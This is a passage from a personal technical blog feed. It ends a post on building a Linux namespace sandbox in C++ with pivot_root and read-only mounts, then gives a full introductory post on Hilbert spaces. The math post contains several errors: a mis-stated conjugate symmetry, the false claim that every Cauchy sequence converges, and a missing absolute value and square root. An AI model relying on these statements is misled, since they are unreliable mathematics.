code it will look like:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="kt">int</span> <span class="nf">mount_onto_new_root</span><span class="p">(</span><span class="n">string</span> <span class="n">path</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">MS_BIND</span> <span class="o">|</span> <span class="n">MS_REC</span> <span class="o">|</span> <span class="n">MS_PRIVATE</span><span class="p">;</span> <span class="n">string</span> <span class="n">dstpath</span> <span class="o">=</span> <span class="n">format</span><span class="p">(</span><span class="s">"%s%s"</span><span class="p">,</span> <span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">());</span> <span class="n">create_dir_recursively</span><span class="p">(</span><span class="n">dstpath</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="n">dstpath</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="s">"proc"</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"mounting directory"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">remount</span><span class="p">(</span><span class="n">string</span> <span class="n">path</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">MS_RDONLY</span> <span class="o">|</span> <span class="n">MS_REMOUNT</span> <span class="o">|</span> <span class="n">MS_BIND</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="n">path</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"remounting directory"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="k">virtual</span> <span class="n">vector</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">get_mount_paths</span><span class="p">()</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="kt">int</span> <span class="n">new_root</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Create a directory if it doesn't exist</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span> <span class="c1">// For pivot_root to work the root of the current file tree</span> <span class="c1">// must not have shared propagation</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="s">"/"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">MS_REC</span> <span class="o">|</span> <span class="n">MS_PRIVATE</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"executing mount() on /"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Ensure that 'new_root' is a mount point</span> <span class="k">if</span> <span class="p">(</span><span class="n">mount</span><span class="p">(</span><span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">MS_BIND</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"executing mount() on new root"</span><span class="p">);</span> <span class="p">}</span> <span class="n">vector</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">paths</span> <span class="o">=</span> <span class="n">get_mount_paths</span><span class="p">();</span> <span class="c1">// Mount paths</span> <span class="k">for</span><span class="p">(</span><span class="k">auto</span> <span class="n">srcpath</span><span class="o">:</span><span class="n">paths</span><span class="p">)</span> <span class="p">{</span> <span class="n">mount_onto_new_root</span><span class="p">(</span><span class="n">srcpath</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Create temporary directory to store the old root</span> <span class="n">string</span> <span class="n">old_root_dir</span> <span class="o">=</span> <span class="n">format</span><span class="p">(</span><span class="s">"%s%s"</span><span class="p">,</span> <span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">PUT_DIR</span><span class="p">);</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">old_root_dir</span><span class="p">.</span><span class="n">c_str</span><span class="p">(),</span> <span class="mo">0777</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">pivot_root</span><span class="p">(</span><span class="n">NEW_ROOT_DIR</span><span class="p">,</span> <span class="n">old_root_dir</span><span class="p">.</span><span class="n">c_str</span><span class="p">())</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"executing pivot_root()"</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="n">chdir</span><span class="p">(</span><span class="s">"/"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"moving to new root"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Remount paths</span> <span class="k">for</span><span class="p">(</span><span class="k">auto</span> <span class="n">srcpath</span><span class="o">:</span><span class="n">paths</span><span class="p">)</span> <span class="p">{</span> <span class="n">remount</span><span class="p">(</span><span class="n">srcpath</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span> <span class="k">if</span> <span class="p">((</span><span class="n">ret</span> <span class="o">=</span> <span class="n">umount2</span><span class="p">(</span><span class="n">PUT_DIR</span><span class="p">,</span> <span class="n">MNT_DETACH</span><span class="p">))</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">error_action</span><span class="p">(</span><span class="n">format</span><span class="p">(</span><span class="s">"Failed unmounting"</span><span class="p">));</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">cerr</span> <span class="o">&lt;&lt;</span> <span class="s">"Failed creating new root"</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// ...</span> <span class="p">}</span></code></pre></figure> <p>We need to make sure this function is run before <code class="language-plaintext highlighter-rouge">child_function()</code> so we can do:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">child_function_wrapper</span><span class="p">()</span> <span class="p">{</span> <span class="n">new_root</span><span class="p">();</span> <span class="n">child_function</span><span class="p">();</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p><strong>Warning:</strong> Make sure <code class="language-plaintext highlighter-rouge">new_root()</code> is run by the child process and that the mount namespace is used! If you get permission denied and have to use <code class="language-plaintext highlighter-rouge">sudo</code> you’re doing it wrong! (Speaking from experience &gt;.&lt;)</p> <p>The child just needs to provide some paths that it would like to mount (read-only):</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="n">vector</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">get_mount_paths</span><span class="p">()</span> <span class="p">{</span> <span class="n">vector</span><span class="o">&lt;</span><span class="n">string</span><span class="o">&gt;</span> <span class="n">paths</span> <span class="o">=</span> <span class="p">{</span> <span class="s">"/usr/bin"</span><span class="p">,</span> <span class="s">"/usr/sbin"</span><span class="p">,</span> <span class="s">"/bin"</span><span class="p">,</span> <span class="s">"/usr/lib"</span><span class="p">,</span> <span class="s">"/lib"</span><span class="p">,</span> <span class="s">"/lib32"</span><span class="p">,</span> <span class="s">"/lib64"</span><span class="p">,</span> <span class="s">"/libx32"</span> <span class="p">};</span> <span class="k">return</span> <span class="n">paths</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>We should now have a minimal jailed system up and running!</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">^_^: ls bin home lib lib32 lib64 libx32 old_root proc tmp usr</code></pre></figure> <h2 id="code">Code</h2> <p>The full example is available on <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-07-02-namespace-jail/main.cpp">Github</a>.</p> <h2 id="conclusion">Conclusion</h2> <p>In this post we went through all the details of creating a shell process with user and mount namespaces. Once we unmount the old root after <code class="language-plaintext highlighter-rouge">pivot_root</code>, the old root does not stay around (though hidden) like it does via chroot .</p> <p>The process of starting with everything disabled and painfully add capabilities is a great way to understand how things are implemented behind the scenes, for example the <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code>.</p> <p>Ed King’s series  on Linux namespaces using Go is very instructive, where they use a higher-level API, which makes it easier to follow. The man pages from man7.org are very helpful, especially the examples!</p> <p>I’d like to sandbox the network as well, but will leave it to a future post.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://en.wikipedia.org/wiki/Linux_namespaces">1</a>] Wikipedia - Linux Namespaces</li> <li>[<a href="https://man7.org/linux/man-pages/man2/clone.2.html">2</a>] clone(2) — Linux manual page</li> <li>[<a href="https://medium.com/@teddyking/linux-namespaces-850489d3ccf">3</a>] Linux Namespaces - Ed King</li> <li>[<a href="https://man7.org/linux/man-pages/man7/user_namespaces.7.html">4</a>] user_namespaces(7) — Linux manual page</li> <li>[<a href="https://lwn.net/Articles/689856">5</a>] LWN.net: Mount namespaces and shared subtrees</li> <li>[<a href="https://man7.org/linux/man-pages/man2/pivot_root.2.html">6</a>] pivot_root(2) — Linux manual page</li> <li>[<a href="https://github.com/google/nsjail">7</a>] Github: google/nsjail</li> <li>[<a href="https://news.ycombinator.com/item?id=23167383">8</a>] Hacker News: comment on <em>Linux containers in a few lines of code</em></li> </ul>Guilherme KunigamiIn a previous post we investigated a jail system using chroot with the conclusion that it was not a safe implementation. In this post we’ll study a safer alternative using Linux namespaces. We’ll develop a C++ application along the way.Hilbert Spaces2021-06-26T00:00:00+00:002021-06-26T00:00:00+00:00https://www.kuniga.me/blog/2021/06/26/hilbert-spaces<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In this post we’ll study the Hilbert space, a special type of vector space that is often used as a tool in the study of partial differential equations, quantum mechanics, Fourier analysis .</p> <!--more--> <p>We’ll first define a Hilbert Space from the ground up from basic linear algebra parts, then study some examples.</p> <h2 id="the-hilbert-vector-space">The Hilbert Vector Space</h2> <h3 id="closedness">Closedness</h3> <p>When we say a set$S$is <strong>closed</strong> under some operation, it means that the result of that operation also belongs to$S$.</p> <p>For example, the set of natural numbers$\mathbb{N}$is closed under addition since the sum of two natural numbers is also natural. On the other hand, it’s not closed under subtraction, since the result might be a negative number.</p> <h3 id="vector-space">Vector Space</h3> <p>Let$V$be a set of vectors and$F$a set of scalars. They define a <strong>vector space</strong> if$V$is closed under addition and scalar multiplication from elements in$F$, which is known as a scalar field or simply <strong>field</strong> and usually is$\mathbb{R}$or$\mathbb{C}$.</p> <p>By this we mean that if$\vec{x}, \vec{y} \in V$, then$\vec{x} + \vec{y} \in V$, and that if$\vec{x} \in V, \alpha \in F$, then$\alpha \vec{x} \in F$.</p> <p>One example of vector space is$V = \mathbb{R}^3$and$F = \mathbb{R}$.</p> <h3 id="inner-product-space">Inner Product Space</h3> <p>The <strong>inner product</strong> is a function from two vectors to a scalar and is denoted by$\langle \vec{x}, \vec{y} \rangle$, which must satisfy the following properties:</p> <p>Let$\vec{x}, \vec{y}, \vec{z} \in V$be vectors and$\alpha \in F$.</p> <p><em>Linearity of the first argument:</em></p> <ul> <li>$\langle \alpha \vec{x}, \vec{y} \rangle = \alpha \langle \vec{x}, \vec{y} \rangle$</li> <li>$\langle \vec{x} + \vec{y}, \vec{z} \rangle = \langle \vec{x}, \vec{z} \rangle + \langle \vec{y}, \vec{z} \rangle$</li> </ul> <p><em>Conjugate symmetry:</em></p> <ul> <li>$\langle \vec{x}, \vec{y} \rangle = \overline{\langle \vec{x}, \vec{y} \rangle}$</li> </ul> <p><em>Positive definiteness:</em></p> <ul> <li>$\langle \vec{x}, \vec{x} \rangle &gt; 0 \mbox{ if } \vec{x} \neq 0$</li> </ul> <p>If our vector space is also closed under the inner product, it’s called a <strong>inner product space</strong>.</p> <p>One example of inner product space is the <em>Euclidean vector space</em>, where$V = \mathbb{R}^n$,$F = \mathbb{R}$and the inner product is the dot product,</p> $\langle \vec{x}, \vec{y} \rangle = \vec{x} \cdot \vec{y} = \sum_{i=1}^n x_i y_i$ <p>We can also define it for complex vector spaces,$V = \mathbb{C}^n$,$F = \mathbb{C}$with inner product defined as</p> $\langle \vec{x}, \vec{y} \rangle = \sum_{i=1}^n \bar{x_i} y_i$ <p>where$\bar{x_i}$is the complex conjugate of$x_i$.</p> <h3 id="normed-space">Normed Space</h3> <p>A normed space is defined over a set of vectors$V$and a <strong>norm</strong> operator denoted by$ \norm{\vec{x}}$, which can be interpreted as the <em>length</em> of a vector. The norm must satisfy:</p> <p><em>Positive definiteness:</em></p> <ul> <li>$\norm{\vec{x}} \ge 0$and$0 \mbox{ iff } \vec{x} = 0$</li> </ul> <p><em>Positive homogeneity:</em></p> <ul> <li>$\norm{ \alpha \vec{x}} = \alpha \norm{\vec{x}}$</li> </ul> <p><em>Subadditivity (Triangle inequality):</em></p> <ul> <li>$\norm{\vec{x} + \vec{y}} \le \norm{\vec{x}} + \norm{\vec{y}}$</li> </ul> <p>We can show that every inner product space is a normed space. The inner product can be used to define a norm for a vector:</p> $(1) \qquad \norm{\vec{x}} = \sqrt{\langle \vec{x}, \vec{x} \rangle}$ <h3 id="metric-space">Metric Space</h3> <p>A metric space is defined over a set of vectors$V$and a <strong>metric</strong>, a function that can be interpreted as the distance between two vectors and denoted by$d(\vec{x}, \vec{y})$, satisfying:</p> <p><em>Positive definiteness:</em></p> <ul> <li>$d(\vec{x}, \vec{y}) \iff x = y$</li> </ul> <p><em>Symmetry:</em></p> <ul> <li>$d(\vec{x}, \vec{y}) = d(\vec{y}, \vec{x})$</li> </ul> <p><em>Subadditivity (Triangle inequality):</em></p> <ul> <li>$d(\vec{x}, \vec{z}) \le d(\vec{x}, \vec{y}) + d(\vec{y}, \vec{z})$</li> </ul> <p>We can show that every normed space is a metric space, since we can define the metric from the norm as:</p> $d(\vec{x}, \vec{y}) = \norm{\vec{x} - \vec{y}}$ <p>Let’s now take a quick detour from vector spaces to cover Cauchy sequences and convergence. They’re an important concept used to define completeness, which we’ll see later.</p> <h3 id="convergent-sequences">Convergent Sequences</h3> <p>A sequence$x_1, x_2, x_3 \cdots \cdots$<strong>converges</strong> to a <strong>limit</strong>$L$if for any value$\varepsilon$, there exists$N$such that for every$n \ge N$such that</p> $|x_n - L| &lt; \varepsilon$ <p>A sequence is <strong>convergent</strong> if it has a finite limit$L$.</p> <h3 id="cauchy-sequences">Cauchy Sequences</h3> <p>A sequence$x_1, x_2, x_3 \cdots \cdots$is a <strong>Cauchy sequence</strong> if for any value$\varepsilon$, there exists$N$such that for every$n, m \ge N$,</p> $\abs{x_n - x_m} &lt; \varepsilon$ <p>Let’s consider the sequence$\sqrt{n}$for$n = 1, 2, \cdots$. Since consecutive values of$\sqrt{n}$get closer and closer to each other as$n$grows, for any$\varepsilon$we can find$n$such that$\abs{\sqrt{n + 1} - \sqrt{n}} &lt; \varepsilon$. However, this has to hold for all indices above some$N$, and since$\sqrt{n}$is unbounded, the difference between$\abs{\sqrt{n} - \sqrt{m}}$for$n, m \ge N$can be arbitrarily large, so this is <em>not</em> a Cauchy sequence.</p> <p>One example of a Cauchy sequence is the sequence defined by$\frac{1}{n}$for$n = 1, 2, \cdots$. Given some$\varepsilon$, we can find$N$such that$\frac{1}{N} &lt; \varepsilon$. This means that for$n, m \ge N$,$\frac{1}{n} &lt; \varepsilon$and$\frac{1}{m} &lt; \varepsilon$, so their absolute difference also has to be bounded by$\varepsilon$.</p> <p><strong>Limit of a Cauchy sequence.</strong> Since we can choose an arbitrarily small value for$\varepsilon$, we can consider it tending to 0. Then</p> $\lim_{\varepsilon \rightarrow 0} x_n = x_m = L \qquad \forall n, m \ge N$ <p>Which means all Cauchy sequences are <em>convergent</em>.</p> <h3 id="complete-metric-space">Complete Metric Space</h3> <p>We can adapt the definition of Cauchy sequences for a metric space$(V, d)$. A sequence is formed by elements from$V$, that is$x_1, x_2, \cdots$for$n = 1, 2, \cdots$and$x_n \in V$. Such a sequence is Cauchy if there is$N$such that for any$\varepsilon$,$d(x_n, x_m) &lt; \varepsilon$for$n, m \ge N$.</p> <p>Let$M$be the limit of a given Cauchy sequence$S$in$(V, d)$. If for any$S$the limit$M \in V$, then we say this metric space is complete. It’s worth noting that even though the result of$d$is in$\mathbb{R}$, the limit of a sequence has a similar “shape” as elements in$S$.</p> <p>One example of complete metric space is$V = \mathbb{R}$with metric as the modulus operation and so is$V = \mathbb{R}^n$with$d$as the Euclidean distance.</p> <p>One example that is <em>not</em> a complete metric space is$V = \mathbb{Q}$, the set of rationals, with metric as the modulus operation. To show that, we just need to find one Cauchy sequence that provides a counter-example. One such sequence is$x_1 = 1$and$x_{n+1} = \frac{x_n}{2} + \frac{1}{x_n}$. We can show this is a Cauchy sequence and then find the limit by setting$x_{n+1} = x_n$, which yields$\sqrt{2}$, which is a irrational number and hence not in$V$.</p> <h3 id="hilbert-space">Hilbert space</h3> <p>Having gone through a bunch of different vector spaces, we are ready to define the <strong>Hilbert space</strong>, which is essentially a <em>inner product space</em> and a <em>complete metric space</em>.</p> <p>A very similar space is the <strong>Banach space</strong> which is a <em>normed space</em> and a <em>complete metric space</em>. Note that since an inner product can be used to define a norm (as we saw in <em>Metric Space</em>), a Hilbert space is also a Banach space, but the opposite is not necessarily true.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-06-26-hilbert-spaces/spaces-diagram.png" alt="Diagram depcting the relationship between different vector spaces" /> <figcaption>Figure 1: Diagram depcting the relationship between different vector spaces.</figcaption> </figure> <h2 id="bases-of-hilbert-spaces">Bases of Hilbert Spaces</h2> <p>We’ll now define the concept of bases for Hilbert spaces. Henceforth we’ll denote a Hilbert space by$H$.</p> <p>But before we start, let’s take a quick detour into topology.</p> <h3 id="dense-sets">Dense Sets</h3> <p>A set$S$is considered <strong>closed</strong> if it contains all its limit points. One convenient way to characterize this in our case is that all convergent sequences have their limit in$S$.</p> <p>For example, the set of real numbers in the closed interval$[0, 1]$is closed, whereas those from the open interval$]0, 1[$is not, because the sequence$\frac{1}{n}$has a limit 0, and 0 does not belong to it.</p> <p>The <strong>closure</strong> of a set$S$, which we’ll denote by$\bar S$is$S$plus the set of all its limit points. Another way to define closure is that it’s the smallest closed set that contains$S$.</p> <p>A subset$A$of$S$is called <strong>dense in</strong>$S$if every point in$x \in S$is either in$A$or it’s one of its limit points . In other words$S$is the closure of$A$. For example, the set of rationals$\mathbb{Q}$is dense in$\mathbb{R}$, because every real number can be approximated to be arbitrarily close to a rational.</p> <h3 id="complete-vs-closed-metric-spaces">Complete vs. Closed Metric Spaces</h3> <p>It’s worth clarifying the difference between closedness and completeness in the context of metric spaces. As we saw, a complete metric space$M$is “closed” under the Cauchy sequences, meaning that the limit of Cauchy sequences belongs to$M$.</p> <p>We can say a closed metric space$M$is one “closed” under convergent sequences, meaning that the limit of convergent sequences belongs to$M$.</p> <p>All Cauchy sequences are convergent, so a complete metric space is also a closed metric space.</p> <h3 id="orthonormal-sets">Orthonormal Sets</h3> <p>Two vectors are <strong>orthogonal</strong> if their inner product equal to 0. More precisely, if$\vec{u}, \vec{v} \in H$and$\langle \vec{f}, \vec{g} \rangle = 0$then$\vec{u}$and$\vec{v}$are orthogonal, also denoted by$\vec{u} \perp \vec{v}$.</p> <p>A subset$B \in H$is <strong>orthonormal</strong> if all its elements are orthogonal and have unitary norm, that is$\forall \vec{u}, \vec{v} \in H$,$\vec{u} \perp \vec{v}$and$\norm{\vec{u}} = 1$.</p> <h3 id="orthonormal-bases">Orthonormal Bases</h3> <p>A set$B \in H$is an <strong>orthonormal basis</strong> if it’s an orthonormal set and it’s complete. The latter means that the linear span$Sp$of$B$is dense in$H$.</p> <p>To unpack that a bit, the linear span of$B$is defined as:</p> $Sp(B) = \bigg \{ \sum_{i=1}^{k} \lambda_i v_i | k \in \mathbb{N}, v_i \in B, \lambda_i \in F \bigg \}$ <p>Where$F$is a scalar field. A set$B$is said <strong>complete</strong> if$\overline{Sp(B)} = H$.</p> <h3 id="dimension">Dimension</h3> <p>The <strong>dimension</strong> of a space is the size of any of its bases. Because Hilbert spaces admit infinite dimensional vectors, it’s possible that the dimension is infinite!</p> <p>We’ll restrict ourselves to cases where the dimensions are <em>countable</em>, which is more general than the finite case .</p> <p>It’s possible to show that$H$having a countable orthonormal base is equivalent to it being <strong>separable</strong>, that is, there is countable subset$S$dense in$H$.</p> <h3 id="vector-from-base">Vector from Base</h3> <p>Like in linear algebra, we can write any vector in$H$as a linear combination of the vectors in the base$B$,$\vec{v_1}, \vec{v_2}, \cdots$:</p> $(2) \quad \vec{x} = \sum_{i=1}^{\infty} \lambda_i \vec{v_i}$ <p>Conversely the coefficients correspond to:</p> $(3) \quad \lambda_i = \langle \vec{v_i}, \vec{x} \rangle$ <h3 id="parsevals-identity">Parseval’s identity</h3> <p>The coefficients from the base above can be used to compute the norm of$\vec{x}$, like in linear algebra:</p> $(4) \quad \norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \abs{\lambda_i}^2$ <p>This is known as the <strong>Parseval’s identity</strong>. We can arrive at this identity by recallling that the norm can be obtained from the inner product as (1):</p> $\norm{\vec{x}} = \sqrt{\langle \vec{x}, \vec{x} \rangle}$ <p>or</p> $\norm{\vec{x}}^2 = \langle \vec{x}, \vec{x} \rangle$ <p>if we replace the first$\vec{x}$by (2),</p> $\norm{\vec{x}}^2 = \langle \sum_{i=1}^{\infty} \lambda_i \vec{v_i}, \vec{x} \rangle$ <p>since inner product is linear on the first argument, we can move the sum and the scalar factor out:</p> $\norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \lambda_i \langle \vec{v_i}, \vec{x} \rangle$ <p>we can then use the conjugate symmetry property to get:</p> $\norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \lambda_i \overline{\langle \vec{v_i}, \vec{x} \rangle}$ <p>and then replace it by (3):</p> $\norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \lambda_i \overline{\lambda_i}$ <p>which then leads to (4). Another way to state Parseval’s identity is to replace$\lambda_i$with$\langle \vec{v_i}, \vec{x} \rangle$instead of the opposite, which leads to:</p> $\norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \abs{\langle \vec{v_i}, \vec{x} \rangle}^2$ <h3 id="bessels-inequality">Bessel’s inequality</h3> <p>Bessel’s inequality is a generalization of Parseval’s:</p> $\norm{\vec{x}}^2 \ge \sum_{i=1}^{N} \abs{\lambda_i}^2$ <p>It follows naturaly from the fact that the interval$[1, N]$is a subset of$[1, \infty]$.</p> <h3 id="orthogonal-complement">Orthogonal Complement</h3> <p>Let$S$be a closed subspace of$H$. Its <strong>orthogonal complement</strong> is defined as</p> $S^{\perp} = \{\vec{y} \in H | \langle \vec{y}, \vec{x} \rangle = 0, \, \forall \vec{x} \in S \}$ <p>An example for some geometric intuition could be for the$\mathbb{R}^3$, with$S$being the vectors in the xy plane, that is, those with$z = 0$. Then$S^{\perp}$would be those perpendicular to the xy plane ($x = y = 0$).</p> <h3 id="orthogonal-projection">Orthogonal Projection</h3> <p>Let$S$be a closed subspace of$H$. The <strong>orthogonal projection</strong> of$\vec{x}$onto$S$is a vector$\vec{x_S}$that minimizes the distance from$\vec{x}$to$S$. Note that$\vec{x}$does not need to be in$S$.</p> <p>More formally, it’s</p> $(5) \quad \vec{x_S} = \mbox{argmin}_{\vec{y} \in S} \norm{\vec{x} - \vec{y}}$ <p>It’s possible to prove$x_S$exists and is unique.</p> <p>Going back to our geometry example, the orthogonal projection of a vector$(x, y, z)$onto$z = 0$is the vector$(x, y, 0)$.</p> <h3 id="the-projection-theorem">The Projection Theorem</h3> <p>Let$S$be a closed subspace of$H$. The theorem states that every$\vec{x} \in H$can be written as$\vec{x} = \vec{x_S} + \vec{x}^{\perp}$, where$\vec{x_S}$is the <strong>orthogonal projection</strong> of$\vec{x}$onto$S$and$\vec{x}^{\perp} \in S^{\perp}$.</p> <p>Going back to our geometry example, we can say that every vector in$\mathbb{R}^3$can be expressed as the sum of a vector in the xy-plane and a vector perpendicular to it, or more specifically,$\vec{x} = (x, y, z)$,$\vec{x_S} = (x, y, 0)$and$(0, 0, z) \in S^{\perp}$.</p> <h3 id="least-square-approximation-via-subspaces">Least Square Approximation via Subspaces</h3> <p>The idea is to approximate a vector with infinite dimension by one with finite one. Recall from (2) that for any$\vec{x} \in H$and base$\vec{v_1}, \vec{v_2}, \cdots$:</p> $\quad \vec{x} = \sum_{i=1}^{\infty} \lambda_i \vec{v_i}$ <p>We can approximate$\vec{x}$by taking the first$N$terms, which we’ll denote by$\vec{x}^{[N]}$:</p> $\quad \vec{x}^{[N]} = \sum_{i=1}^{N} \lambda_i \vec{v_i}$ <p>It’s possible to show that$\vec{x}^{[N]}$is a orthogonal projection of$\vec{x}$onto$V_N = Sp(\vec{v_1}, \vec{v_2}, \cdots, \vec{v_N})$. Thus, by (5):</p> $\norm{\vec{x} - \vec{x}^{[N]}} = \min \{\norm{\vec{x} - \vec{y}} \mid \vec{y} \in V_N \}$ <p>since$y \in V_N$,$y = \sum_{i=1}^{N} \alpha_i \vec{v_i}$. We can define an error function taking$\alpha_i$as parameter:</p> $E_N(\alpha_1, \cdots, \alpha_N) = \norm{\vec{x} - \sum_{i=1}^{N} \alpha_i \vec{v_i}}$ <p>The idea is then to find the value of$\alpha$’s that minimize${E_N}^2$(least squares).</p> <h2 id="examples">Examples</h2> <h3 id="finite-euclidean-spaces">Finite Euclidean Spaces</h3> <p>We’ve seen that the Euclidean vector space is a inner product space (see <em>Inner Product Space</em>) and a complete metric space (see <em>Complete metric space</em>), so it’s a Hilbert space by definition.</p> <h3 id="polynomial-functions">Polynomial Functions</h3> <p>Most of the times when we talk about vector spaces we use scalars or vectors of scalars as examples, but nothing stops us from using other types of objects like functions. We can have a vector space of polynomial functions for example.</p> <p>A polynomial function of degree$N$takes a variable$x$and returns a polynomial$\sum_{i = 0}^{N} \alpha_i x^i$where$\alpha_i$is a scalar from an interval$[a, b]$. The set of polynomial functions of degree$N$over a field$F$can be denoted as$\mathbb{P}_N(F)$.</p> <p>The inner product of two polynomial functions$\vec{f}$and$\vec{g}$can be defined as:</p> $\langle \vec{f}, \vec{g} \rangle = \int_a^b \overline{f(x)} g(x) dx$ <p>This function is also known as$L^2[a, b]$. It’s possible to show that the vector space$(\mathbb{P}_N(F), L^2[a, b])$is a Hilbert one.</p> <h3 id="square-summable-sequences">Square Summable Sequences</h3> <p>One interesting advantage of building vector spaces based on properties like inner product instead of working directly with the actual vectors is that we can have vector spaces with infinte dimensions!</p> <p>Let$\mathbb{C}^{\infty}$be the set of complex vectors with infinite dimensions and inner product:</p> $\langle \vec{x}, \vec{y} \rangle = \sum_{i=1}^{\infty} \bar{x_i} y_i$ <p>From that we can define the norm as:</p> $\norm{\vec{x}} = \sum_{i=1}^{\infty} \abs{x_i}^2$ <p>Let$\ell^2$be the subset of$\mathbb{C}^{\infty}$for those that have finite norm, that is:</p> $\ell^2 = \{ \vec{x} \in \mathbb{C}^\infty \mid \sum_{i=1}^{\infty} \abs{x_i}^2 &lt; \infty \}$ <p>$\ell^2$is also known as <strong>square summable sequences</strong>, since the elements of $$\vec{x} \in \ell^2$$ form a sequence that has a finite square sum.</p> <p>It’s possible to show $$\ell^2$$ is a Hilbert space.</p> <h2 id="conclusion">Conclusion</h2> <p>In this post we covered some topics around Hilbert spaces. I’m mostly interested in definitions and theorems, so I ended up skipping their proofs. Although there’s some geometric intuition to it, a lot of the content is still a bit over my head, and I’m hoping studying some of the applications in the future will help clarify things.</p> <p>My main motiviation in studying these topics is to better understand the mathematics of signal processing. I’ve started reading Prandoni and Vetterli’s <em>Signal Processing for Communications</em>  where they first discuss Hilbert spaces.</p> <p>This is my first foray into functional analysis and topology and it felt very hard to understand, but I love how much available material there is about this subject 